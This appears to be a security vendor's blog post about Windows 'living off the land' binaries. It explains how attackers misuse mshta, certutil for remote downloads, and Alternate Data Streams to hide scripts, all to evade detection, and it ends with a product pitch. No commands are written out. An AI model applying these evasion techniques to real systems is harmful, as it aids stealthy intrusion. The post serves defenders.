This article is part of the series "Living off the Land With Microsoft". Check out the rest:
- The Malware Hiding in Your Windows System32 Folder: Intro to Regsvr32
- The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware
- The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate Data Streams
- The Malware Hiding in Your Windows System32 Folder: More Alternate Data Streams and Rundll32
- The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL Security Defense Tips
We don’t like to think that the core Window binaries on our servers are disguised malware, but it’s not such a strange idea. OS tools such as regsrv32 and mshta (LoL-ware) are the equivalent in the non-virtual world of garden tools and stepladders left near the kitchen window. Sure these tools are useful for work around the yard, but unfortunately they can also be exploited by the bad guys.
Microsoft no longer supports HTA, but they left the underlying executable, mshta.exe, lying around on Windows’ virtual lawn – the Windows\System32 folder.
And hackers have only been too eager to take advantage of it. To make the matters worse, on far too many Windows installations, the .hta file extension is still associated with mshta. A phishmail victim who receives an .hta file attachments, will automatically launch the app if she clicks on it.
Of course, you’ll have to do more than just disassociate the .hta extension to stop all attacks — see, for example, the Windows Firewall mitigation in the previous post. For kicks, I tried directly executing an .hta file using mshta, and you can see the results below:
It worked fine.
But hackers are far too smart to reveal what they’re doing through obvious file transfer commands! The whole point of living off the land using existing Windows binaries is to hide activities.
Certutil and Curl-free Remote Downloading
This leads to certutil, which is yet another Windows binary that serves dual purposes. Its function is to dump, display, and configure certification authority (CA) information. You can read more about it here.
In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsrv32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file.
This is not completely surprising since certutil has remote capabilities, but it’s clearly not checking the format of the file — effectively turning certutil into LoL-ware version of curl.
As it turns out, hackers were way ahead of the researchers. It was reported that Brazilians have been using certutil for some time.
So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools.
Hiding Executables With Alternate Data Streams (ADS)
Can the attackers get even stealthier? Unfortunately, yes!
The amazingly clever Oddvar Moe has a great post on Alternate Data Streams, and how it can be used to hide malware scripts and executables in a file.
ADS was Microsoft’s answer to supporting compatibility with Apple McIntosh’s file system. In the Mac word, files have a lot of metadata in addition to regular data associated with them. To make it possible to store this metadata in Windows, Microsoft created ADS.
For example, I can do something like this:
On a first review, it might look like I’m directing the text of my .hta file into “stuff.txt”.
Take a closer look at the above screenshot, and notice the “:evil.ps1” that’s tacked on. And then shift your focus to the size of “stuff.txt”: it remains at 0 bytes!
What happened to the text I directed into the file? It’s hidden in the ADS part of the Windows file system. It turns out that I can directly run scripts and binaries that are secretly held in the ADS part of the file system.
And One More Thing
We’ll take a deeper dive into ADS next time. The larger point is the high-level of stealthiness one can achieve with the LoL approach to hacking. There are other binaries that serve dual masters, and you can find a complete list of them on github.
For example, there are whole class of Windows binaries — for example, esentutil, extrac32, and others — that act as a file copy tool. In other words, the attackers don’t have to necessarily reveal themselves by using the obvious Windows “copy” command.
So security detection software that’s based on scanning the Windows Event log looking for the usual Windows file commands will miss sneaky LoL-based hacker file activity.
The lesson is that you need, ahem, a security platform that can analyze the raw file system activity to determine what’s really going on. And then notify your security team when it detects unusual access to the underlying files and directories.
Does the Lol-ware approach to hacking scare you, just a little? Our Varonis Data Security Platform can spot what the hackers don’t want you to see. Lean more!